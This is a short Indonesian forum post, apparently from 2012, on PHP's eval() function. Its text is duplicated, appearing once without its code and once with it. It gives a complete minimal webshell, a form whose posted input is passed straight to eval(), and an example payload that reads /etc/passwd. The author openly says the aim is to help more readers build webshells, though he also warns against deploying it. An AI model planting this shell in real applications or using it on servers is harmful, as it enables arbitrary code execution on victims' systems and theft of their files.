09-01-2012, 09:09 PM
sedikit share ajah neh biar nggak pengguna baru banget mengenai pemrograman php, kali ini aku pngen share mengenai fungsi eval() pada php.
eval() merupakan sebuah fungsi untuk mengeksekusi perintah php, mirip sama dengan system() atau exec() (fungsi untuk mengeksekusi perintah shell), eval() mengeksekusi perintah php
sebenarnya penggunaan fungsi ini sangat mudah :d
yup... maka akan keluar sebuah textarea dimana anda bebas mengisi apasaja kode pemrograman php. seperti
atau yang lebih ekstrim seperti :
nah... harapan saya dengan adanya thread ini makin banyak kawan yang bisa buat webshell
semoga bermanfaat.
ingat juga. jangan pernah memasang fungsi ini pada aplikasi web karena bisa sangat sangat sangat sangat berbahaya
eval() merupakan sebuah fungsi untuk mengeksekusi perintah php, mirip sama dengan system() atau exec() (fungsi untuk mengeksekusi perintah shell), eval() mengeksekusi perintah php
sebenarnya penggunaan fungsi ini sangat mudah :d
PHP Code:
<?php
eval($_POST['code']);
?>
<form method=post>
<textarea name=code><?php $_POST['code']; ?></textarea>
<input type=submit value=eval>
</form>
yup... maka akan keluar sebuah textarea dimana anda bebas mengisi apasaja kode pemrograman php. seperti
PHP Code:
echo "hello backtrack";
atau yang lebih ekstrim seperti :
PHP Code:
echo fread(fopen("/etc/passwd", "r"),filesize("/etc/passwd"));
nah... harapan saya dengan adanya thread ini makin banyak kawan yang bisa buat webshell
semoga bermanfaat.
ingat juga. jangan pernah memasang fungsi ini pada aplikasi web karena bisa sangat sangat sangat sangat berbahaya